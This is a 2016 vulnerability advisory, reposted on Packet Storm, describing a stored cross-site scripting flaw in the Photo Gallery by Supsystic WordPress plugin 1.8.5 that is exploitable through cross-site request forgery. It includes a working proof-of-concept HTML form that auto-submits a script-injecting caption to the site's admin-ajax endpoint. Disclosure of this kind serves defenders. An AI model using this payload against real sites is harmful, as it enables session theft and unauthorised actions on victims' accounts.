WordPress Photo Gallery by Supsystic plugin version 1.8.5 suffers from a stored cross site scripting vulnerability.
bbf2306a93d24ed38fba12a410983e1a258e6de79e1573df0e5cad64ddd36e74------------------------------------------------------------------------
Stored Cross-Site Scripting vulnerability in Photo Gallery WordPress
Plugin
------------------------------------------------------------------------
Umit Aksu, July 2016
------------------------------------------------------------------------
Abstract
------------------------------------------------------------------------
A Cross-Site Scripting vulnerability was found in the Photo Gallery by
Supsystic WordPress Plugin. This issue allows an attacker to perform a
wide variety of actions, such as stealing users' session tokens, or
performing arbitrary actions on their behalf. In order to exploit this
issue, the attacker has to lure/force a victim into opening a malicious
website/link.
------------------------------------------------------------------------
OVE ID
------------------------------------------------------------------------
OVE-20160722-0004
------------------------------------------------------------------------
Tested versions
------------------------------------------------------------------------
This issue was successfully tested on Photo Gallery by Supsystic
WordPress Plugin version 1.8.5.
------------------------------------------------------------------------
Fix
------------------------------------------------------------------------
This issue is resolved in Photo Gallery by Supsystic version 1.8.6.
------------------------------------------------------------------------
Details
------------------------------------------------------------------------
https://sumofpwn.nl/advisory/2016/stored_cross_site_scripting_vulnerability_in_photo_gallery_wordpress_plugin.html
It is possible to deliver a Cross-Site Scripting attack through Cross-Site Request Forgery. The caption text in the gallery is vulnerable to a stored Cross-Site Scripting. The Cross-Site Scripting attack is normaly only exploitable if the attacker has admin privileges. However, no measures are implemented to protect against Cross-Site Request Forgery on the request that saves the image details. Due to this, it is possible to exploit this issue via Cross-Site Request Forgery.
Proof of concept
<html>
<body>
<form method="post" action="https://<target>/wp-admin/admin-ajax.php">
<input type="hidden" name="caption" value='this is the caption"><script>alert("Fromfff CSRF to XSS!");</script>'>
<input type="hidden" name="captionEffect" value="quarter-slide-up">
<input type="hidden" name="description" value="">
<input type="hidden" name="alt" value="Capture">
<input type="hidden" name="link" value="">
<input type="hidden" name="cropPosition" value="center-center">
<input type="hidden" name="replace_attachment_id" value="">
<input type="hidden" name="image_id" value="13">
<input type="hidden" name="attachment_id" value="10">
<input type="hidden" name="gallery_id" value="6">
<input type="hidden" name="action" value="grid-gallery">
<input type="hidden" name="route[module]" value="photos">
<input type="hidden" name="route[action]" value="updateAttachment">
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>
------------------------------------------------------------------------
Summer of Pwnage (https://sumofpwn.nl) is a Dutch community project. Its
goal is to contribute to the security of popular, widely used OSS
projects in a fun and educational way.
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed